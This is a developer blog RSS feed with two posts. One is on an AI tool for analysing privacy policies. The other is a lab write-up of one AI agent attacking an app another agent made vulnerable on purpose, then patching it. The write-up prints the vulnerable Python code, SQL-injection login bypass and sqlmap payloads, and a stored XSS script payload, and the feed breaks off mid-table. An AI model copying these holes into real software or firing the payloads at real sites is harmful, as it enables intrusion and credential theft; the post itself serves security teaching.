<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>DEV Community: Abdallah Abughallous</title>
    <description>The latest articles on DEV Community by Abdallah Abughallous (@abdallahag).</description>
    <link>https://dev.to/abdallahag</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3998237%2F05a39631-a5f3-4a0b-8995-0d7fb90fe318.jpg</url>
      <title>DEV Community: Abdallah Abughallous</title>
      <link>https://dev.to/abdallahag</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://dev.to/feed/abdallahag"/>
    <language>en</language>
    <item>
      <title>No one reads privacy policies. So I built 6 AI Agents to do it for me.</title>
      <dc:creator>Abdallah Abughallous</dc:creator>
      <pubDate>Sat, 04 Jul 2026 16:23:18 +0000</pubDate>
      <link>https://dev.to/abdallahag/no-one-reads-privacy-policies-so-i-built-6-ai-agents-to-do-it-for-me-37k1</link>
      <guid>https://dev.to/abdallahag/no-one-reads-privacy-policies-so-i-built-6-ai-agents-to-do-it-for-me-37k1</guid>
      <description>&lt;p&gt;We all know the drill: you sign up for a new service, a massive wall of legal text pops up, and you instantly scroll to the bottom and click "I Accept." As developers, we know exactly how much data is being harvested, yet we still don't have the time to read through 40 pages of legal jargon.&lt;/p&gt;

&lt;p&gt;For the Microsoft Agents League Hackathon (Reasoning Agents Track) in collaboration with Microsoft Foundry, I decided to build a solution.&lt;/p&gt;

&lt;p&gt;Meet TrustGuard AI — a multi-agent system that doesn't just summarize privacy policies, but uses sequential reasoning to decode real-world risks, hunt down dark patterns, and benchmark sites against tech giants.&lt;/p&gt;

&lt;p&gt;Here is a breakdown of how I built it and the architecture behind the agents. 🚀&lt;/p&gt;

&lt;p&gt;🧠 Summarization vs. Reasoning&lt;br&gt;
The problem with most LLM-based legal tools is that they just summarize. But summarizing a terrible privacy clause just gives you a shorter terrible privacy clause.&lt;/p&gt;

&lt;p&gt;I wanted the AI to reason. Using Azure AI Foundry (GPT-5.4), TrustGuard AI runs a sequential pipeline where each agent has a specific job, passing context to the next to build a comprehensive risk profile.&lt;/p&gt;

&lt;p&gt;⚙️ The 6-Agent Pipeline&lt;br&gt;
The core of TrustGuard is an orchestration of 6 specialized agents:&lt;/p&gt;

&lt;p&gt;🔍 Extractor: Scrapes and parses every clause (data collection, sharing, retention, user rights).&lt;/p&gt;

&lt;p&gt;⚖️ Legal Reasoner: Takes the extracted text and infers real-world implications. What happens to the user if this company gets breached?&lt;/p&gt;

&lt;p&gt;🕵️ Dark Patterns Detector: Looks for manipulative UX/legal tactics—forced consent, vague language, and obstruction.&lt;/p&gt;

&lt;p&gt;📖 Readability Analyzer: Combines traditional algorithms (Flesch-Kincaid) with AI grading to score how intentionally convoluted the policy is.&lt;/p&gt;

&lt;p&gt;🧾 Rights Auditor: Audits compliance across 7 fundamental user rights (access, deletion, etc.) and evaluates the friction involved in exercising them.&lt;/p&gt;

&lt;p&gt;📊 Comparator (Policy DNA™): Benchmarks the analyzed policy against 8 major platforms.&lt;/p&gt;

&lt;p&gt;✨ The Coolest Tech Features&lt;br&gt;
Policy DNA™ Benchmark: Instead of an arbitrary score, the Comparator agent gives relative metrics (e.g., "This site is 23% riskier than TikTok").&lt;/p&gt;

&lt;p&gt;Silent Update Detection: Companies change policies quietly. I implemented a Change Tracker that uses SHA-256 diffing between visits to flag silent updates.&lt;/p&gt;

&lt;p&gt;Global Compliance: Simultaneously checks the text against 6 major legal frameworks (GDPR, CCPA, PDPA, PIPEDA, LGPD, DPDPA).&lt;/p&gt;

&lt;p&gt;The Tech Stack:&lt;/p&gt;

&lt;p&gt;AI &amp;amp; LLM: Azure AI Foundry · GPT-5.4&lt;/p&gt;

&lt;p&gt;Backend: Python · Flask · fpdf2 (for generating reports)&lt;/p&gt;

&lt;p&gt;Frontend: Vanilla JS · HTML/CSS&lt;/p&gt;

&lt;p&gt;Scraping &amp;amp; NLP: BeautifulSoup4 · requests · Local Flesch-Kincaid logic&lt;/p&gt;

&lt;p&gt;🚀 Run it locally&lt;br&gt;
I've open-sourced the project under the PolyForm Noncommercial License for the community to study, modify, and play around with.&lt;/p&gt;

&lt;p&gt;You can get it running in a couple of minutes:&lt;/p&gt;

&lt;p&gt;Bash&lt;/p&gt;

&lt;h1&gt;
  
  
  1. Clone the repo
&lt;/h1&gt;

&lt;p&gt;git clone &lt;a href="https://github.com/YOUR_USERNAME/trustguard-ai.git" rel="noopener noreferrer"&gt;https://github.com/YOUR_USERNAME/trustguard-ai.git&lt;/a&gt;&lt;br&gt;
cd trustguard-ai&lt;/p&gt;

&lt;h1&gt;
  
  
  2. Setup virtual environment
&lt;/h1&gt;

&lt;p&gt;python -m venv venv &amp;amp;&amp;amp; source venv/bin/activate   # Windows: venv\Scripts\activate&lt;br&gt;
pip install -r requirements.txt&lt;/p&gt;

&lt;h1&gt;
  
  
  3. Configure environment variables
&lt;/h1&gt;

&lt;p&gt;cp .env.example .env&lt;/p&gt;

&lt;h1&gt;
  
  
  Open .env and add your Azure Foundry credentials (AZURE_ENDPOINT, AZURE_API_KEY, DEPLOYMENT_NAME)
&lt;/h1&gt;

&lt;h1&gt;
  
  
  4. Run the Flask app
&lt;/h1&gt;

&lt;p&gt;python app.py&lt;br&gt;
Open &lt;a href="http://localhost:5000" rel="noopener noreferrer"&gt;http://localhost:5000&lt;/a&gt; and throw your favorite (or least favorite) website's privacy policy at it!&lt;/p&gt;

&lt;p&gt;💬 Let's Discuss!&lt;br&gt;
Building multi-agent pipelines requires a lot of tweaking when it comes to context window management and prompt hand-offs between agents. If you've built similar sequential pipelines, I’d love to hear how you handle agent-to-agent communication!&lt;/p&gt;

&lt;p&gt;📺 Demo Video: Check it in the repo&lt;br&gt;
💻 GitHub Repo: &lt;a href="https://github.com/AbdaullahAG/Trustguard_AI" rel="noopener noreferrer"&gt;https://github.com/AbdaullahAG/Trustguard_AI&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Would love to hear your technical feedback in the comments! 👇&lt;/p&gt;

</description>
      <category>agents</category>
      <category>ai</category>
      <category>privacy</category>
      <category>showdev</category>
    </item>
    <item>
      <title>When AI Attacks Itself: A Fully Autonomous Red Team vs Blue Team Experiment</title>
      <dc:creator>Abdallah Abughallous</dc:creator>
      <pubDate>Tue, 23 Jun 2026 07:41:13 +0000</pubDate>
      <link>https://dev.to/abdallahag/when-ai-attacks-itself-a-fully-autonomous-red-team-vs-blue-team-experiment-2pe</link>
      <guid>https://dev.to/abdallahag/when-ai-attacks-itself-a-fully-autonomous-red-team-vs-blue-team-experiment-2pe</guid>
      <description>&lt;h2&gt;
  
  
  When AI Attacks Itself: A Fully Autonomous Red Team vs Blue Team Experiment
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Date:&lt;/strong&gt; June 22, 2026 · &lt;strong&gt;Environment:&lt;/strong&gt; Kali Linux VM · Azure OpenAI · Docker&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Tags:&lt;/strong&gt; &lt;code&gt;AI Security&lt;/code&gt; &lt;code&gt;Penetration Testing&lt;/code&gt; &lt;code&gt;AppSec&lt;/code&gt; &lt;code&gt;Autonomous Agents&lt;/code&gt; &lt;code&gt;GPT-4o&lt;/code&gt; &lt;code&gt;gpt-5.2&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  The Idea I Couldn't Get Out of My Head
&lt;/h2&gt;

&lt;p&gt;What if two AI agents fought each other — one building and defending a web application, the other trying to break in? Two different models. No human intervention. No waiting. No typos in terminal commands.&lt;/p&gt;

&lt;p&gt;I ran the experiment. The results were more interesting than I expected — not just because the attack and defense both worked, but because of &lt;strong&gt;how fast everything happened&lt;/strong&gt;.&lt;/p&gt;




&lt;h2&gt;
  
  
  The Setup
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Two models. Two roles. One isolated Kali Linux VM.&lt;/strong&gt;&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Agent&lt;/th&gt;
&lt;th&gt;Model&lt;/th&gt;
&lt;th&gt;Role&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;🔴 Red Agent&lt;/td&gt;
&lt;td&gt;GPT-4o (Azure OpenAI)&lt;/td&gt;
&lt;td&gt;Attack, analyze findings, verify patch&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;🔵 Blue Agent&lt;/td&gt;
&lt;td&gt;gpt-5.2 (Azure OpenAI)&lt;/td&gt;
&lt;td&gt;Build target app, patch vulnerabilities&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;strong&gt;Target stack:&lt;/strong&gt; Flask · SQLite · Werkzeug 3.1.8 · Python 3.11.15 · Docker&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Why two different models?&lt;/strong&gt; Using GPT-4o for offense and gpt-5.2 for defense creates genuine asymmetry — each model brings different reasoning patterns to its role. A single model playing both sides would produce biased results.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;A note on tooling:&lt;/strong&gt; We started with AutoGen for agent orchestration, but hit a library conflict — AutoGen's bundled &lt;code&gt;openai&lt;/code&gt; v0.x clashed with the modern &lt;code&gt;openai&lt;/code&gt; v1.x SDK. We scrapped it and called the Azure OpenAI API directly. Simpler, faster, no magic.&lt;/p&gt;




&lt;h2&gt;
  
  
  Phase 1: Proof of Concept
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Act 1 — Blue Agent Builds the Target ⏱️ 15 seconds
&lt;/h3&gt;

&lt;p&gt;Blue Agent (&lt;code&gt;gpt-5.2&lt;/code&gt;) was given one instruction: build a Flask/SQLite web app, deploy it via Docker, and intentionally leave two vulnerabilities in it for the experiment.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Vulnerability 1: SQL Injection&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ❌ User input injected directly into SQL query
&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT * FROM users WHERE username=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt; AND password=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;pwd&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="sh"&gt;'"&lt;/span&gt;
&lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;query&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Vulnerability 2: Stored XSS&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ❌ Raw user input stored and rendered without sanitization
&lt;/span&gt;&lt;span class="n"&gt;comments_html&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;p&amp;gt;&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;]&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;rows&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The database was pre-seeded with two users: &lt;code&gt;admin:secret123&lt;/code&gt; and &lt;code&gt;alice:pass456&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;From script execution to &lt;code&gt;Container vulnerable-webapp Started&lt;/code&gt;: &lt;strong&gt;15 seconds&lt;/strong&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;$ &lt;/span&gt;curl &lt;span class="nt"&gt;-s&lt;/span&gt; http://localhost:5000/login | &lt;span class="nb"&gt;grep&lt;/span&gt; &lt;span class="nt"&gt;-o&lt;/span&gt; &lt;span class="s2"&gt;"&amp;lt;h2&amp;gt;.*&amp;lt;/h2&amp;gt;"&lt;/span&gt;
&amp;lt;h2&amp;gt;Login&amp;lt;/h2&amp;gt;   &lt;span class="c"&gt;# ✅ App is live on port 5000&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;






&lt;h3&gt;
  
  
  Act 2 — Red Agent Attacks ⏱️ 70 seconds
&lt;/h3&gt;

&lt;p&gt;Red Agent (&lt;code&gt;GPT-4o&lt;/code&gt;) ran a four-phase attack script automatically.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Phase 1 — Reconnaissance: nmap (6.38 seconds)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;PORT     STATE SERVICE VERSION
5000/tcp open  http    Werkzeug httpd 3.1.8 (Python 3.11.15)
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Framework version fingerprinted. We know exactly what we're dealing with.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Phase 2 — Manual SQL Injection (&amp;lt; 1 second)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Payload:  admin' OR '1'='1
Response: ✅ Welcome admin!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Login bypassed on the first attempt. Classic OR-based injection.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Phase 3 — sqlmap Automated Scan (10 seconds)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;sqlmap automatically identified the backend as SQLite, then discovered &lt;strong&gt;three injection techniques&lt;/strong&gt; on the same &lt;code&gt;username&lt;/code&gt; parameter:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight sql"&gt;&lt;code&gt;&lt;span class="k"&gt;Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;boolean&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;based&lt;/span&gt; &lt;span class="n"&gt;blind&lt;/span&gt;
&lt;span class="n"&gt;Payload&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;admin&lt;/span&gt;&lt;span class="s1"&gt;' AND CASE WHEN 1348=1348 THEN 1348
         ELSE JSON(CHAR(69,74,90,69)) END AND '&lt;/span&gt;&lt;span class="n"&gt;xgKy&lt;/span&gt;&lt;span class="s1"&gt;'='&lt;/span&gt;&lt;span class="n"&gt;xgKy&lt;/span&gt;

&lt;span class="k"&gt;Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;time&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;based&lt;/span&gt; &lt;span class="n"&gt;blind&lt;/span&gt;
&lt;span class="n"&gt;Payload&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="k"&gt;admin&lt;/span&gt;&lt;span class="s1"&gt;' AND 7314=LIKE(CHAR(65,66,67,68,69,70,71),
         UPPER(HEX(RANDOMBLOB(500000000/2)))) AND '&lt;/span&gt;&lt;span class="n"&gt;fesM&lt;/span&gt;&lt;span class="s1"&gt;'='&lt;/span&gt;&lt;span class="n"&gt;fesM&lt;/span&gt;

&lt;span class="k"&gt;Type&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="k"&gt;UNION&lt;/span&gt; &lt;span class="n"&gt;query&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt; &lt;span class="n"&gt;columns&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;Payload&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;username&lt;/span&gt;&lt;span class="o"&gt;=-&lt;/span&gt;&lt;span class="mi"&gt;5323&lt;/span&gt;&lt;span class="s1"&gt;' UNION ALL SELECT NULL,CHAR(113,120,112,107,113)
         ||CHAR(70,109,100,...)||CHAR(113,120,118,106,113),NULL-- qZAZ
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then dumped the entire database — 100 HTTP requests total:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Database: SQLite_masterdb
Table: users
+----+-----------+----------+
| id | password  | username |
+----+-----------+----------+
| 1  | secret123 | admin    |
| 2  | pass456   | alice    |
+----+-----------+----------+
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Phase 4 — Stored XSS (&amp;lt; 1 second)&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight html"&gt;&lt;code&gt;Payload stored:  &lt;span class="nt"&gt;&amp;lt;script&amp;gt;&lt;/span&gt;&lt;span class="nf"&gt;alert&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;XSS_PWNED&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;&lt;span class="nt"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;
Reflected back:  ✅ Script tag present — executes in any visitor's browser
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Total: 70 seconds. 100 HTTP requests. Every credential stolen. XSS payload live.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;GPT-4o then analyzed its own attack output and produced a structured threat intelligence report:&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Vulnerability&lt;/th&gt;
&lt;th&gt;Severity&lt;/th&gt;
&lt;th&gt;Impact&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;SQL Injection&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;Critical&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Full database compromise, authentication bypass&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Stored XSS&lt;/td&gt;
&lt;td&gt;&lt;strong&gt;High&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Arbitrary JavaScript execution on all visitors&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;&lt;em&gt;API cost for this analysis: 4,667 tokens — roughly $0.05.&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Act 3 — Blue Agent Patches the Code ⏱️ 30 seconds
&lt;/h3&gt;

&lt;p&gt;The GPT-4o threat report was passed directly to Blue Agent (&lt;code&gt;gpt-5.2&lt;/code&gt;) along with the vulnerable &lt;code&gt;app.py&lt;/code&gt;. No human read the report. No human wrote the fix.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fix 1: Parameterized Queries&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ✅ SQL logic and user data are now completely separated
&lt;/span&gt;&lt;span class="n"&gt;cur&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;execute&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;SELECT * FROM users WHERE username=? AND password=?&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;user&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;pwd&lt;/span&gt;&lt;span class="p"&gt;))&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;The database driver handles escaping. User input is always treated as a literal value — never as SQL syntax.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Fix 2: Output Encoding + CSP Header&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# ✅ Special characters neutralized before rendering
&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;html&lt;/span&gt;
&lt;span class="n"&gt;comments_html&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sh"&gt;""&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;join&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sa"&gt;f&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;p&amp;gt;&lt;/span&gt;&lt;span class="si"&gt;{&lt;/span&gt;&lt;span class="n"&gt;html&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;escape&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;&lt;span class="si"&gt;}&lt;/span&gt;&lt;span class="s"&gt;&amp;lt;/p&amp;gt;&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="n"&gt;rows&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="c1"&gt;# + Content-Security-Policy: script-src 'self'  (added to response headers)
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Blue Agent automatically saved a backup of the original file (&lt;code&gt;app.py.backup&lt;/code&gt;), wrote the patched version, and the orchestrator triggered a Docker rebuild:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="o"&gt;[&lt;/span&gt;+] Building 1.6s &lt;span class="o"&gt;(&lt;/span&gt;11/11&lt;span class="o"&gt;)&lt;/span&gt; FINISHED
✔ Container vulnerable-webapp  Started ✅
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;em&gt;API cost for patch generation: 2,561 tokens — roughly $0.03.&lt;/em&gt;&lt;/p&gt;




&lt;h3&gt;
  
  
  Act 4 — Red Agent Confirms the Fix ⏱️ 3 seconds
&lt;/h3&gt;

&lt;p&gt;Same payloads. Same tools. Different result.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;SQL Injection — blocked&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Payload: admin&lt;span class="s1"&gt;' OR '&lt;/span&gt;1&lt;span class="s1"&gt;'='&lt;/span&gt;1
Result:  ❌ Invalid credentials
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;sqlmap — full arsenal, nothing found&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight ini"&gt;&lt;code&gt;&lt;span class="nn"&gt;[WARNING]&lt;/span&gt; &lt;span class="err"&gt;POST&lt;/span&gt; &lt;span class="err"&gt;parameter&lt;/span&gt; &lt;span class="err"&gt;'username'&lt;/span&gt; &lt;span class="err"&gt;does&lt;/span&gt; &lt;span class="err"&gt;not&lt;/span&gt; &lt;span class="err"&gt;seem&lt;/span&gt; &lt;span class="err"&gt;to&lt;/span&gt; &lt;span class="err"&gt;be&lt;/span&gt; &lt;span class="err"&gt;injectable&lt;/span&gt;
&lt;span class="nn"&gt;[WARNING]&lt;/span&gt; &lt;span class="err"&gt;POST&lt;/span&gt; &lt;span class="err"&gt;parameter&lt;/span&gt; &lt;span class="err"&gt;'password'&lt;/span&gt; &lt;span class="err"&gt;does&lt;/span&gt; &lt;span class="err"&gt;not&lt;/span&gt; &lt;span class="err"&gt;seem&lt;/span&gt; &lt;span class="err"&gt;to&lt;/span&gt; &lt;span class="err"&gt;be&lt;/span&gt; &lt;span class="err"&gt;injectable&lt;/span&gt;
&lt;span class="nn"&gt;[CRITICAL]&lt;/span&gt; &lt;span class="err"&gt;all&lt;/span&gt; &lt;span class="err"&gt;tested&lt;/span&gt; &lt;span class="err"&gt;parameters&lt;/span&gt; &lt;span class="err"&gt;do&lt;/span&gt; &lt;span class="err"&gt;not&lt;/span&gt; &lt;span class="err"&gt;appear&lt;/span&gt; &lt;span class="err"&gt;to&lt;/span&gt; &lt;span class="err"&gt;be&lt;/span&gt; &lt;span class="err"&gt;injectable.&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;sqlmap tried every technique it had. All failed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Stored XSS — escaped&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;Input:  &amp;lt;script&amp;gt;alert&lt;span class="o"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;"XSS_PWNED"&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&amp;lt;/script&amp;gt;
Output: &amp;amp;lt&lt;span class="p"&gt;;&lt;/span&gt;script&amp;amp;gt&lt;span class="p"&gt;;&lt;/span&gt;alert&lt;span class="o"&gt;(&lt;/span&gt;&amp;amp;quot&lt;span class="p"&gt;;&lt;/span&gt;XSS_PWNED&amp;amp;quot&lt;span class="p"&gt;;&lt;/span&gt;&lt;span class="o"&gt;)&lt;/span&gt;&amp;amp;lt&lt;span class="p"&gt;;&lt;/span&gt;/script&amp;amp;gt&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Stored as plain text. Browser renders it, doesn't execute it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Legitimate login still works:&lt;/strong&gt;&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nv"&gt;username&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;admin&amp;amp;password&lt;span class="o"&gt;=&lt;/span&gt;secret123  →  ✅ Welcome admin!
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Vulnerability&lt;/th&gt;
&lt;th&gt;Before Patch&lt;/th&gt;
&lt;th&gt;After Patch&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
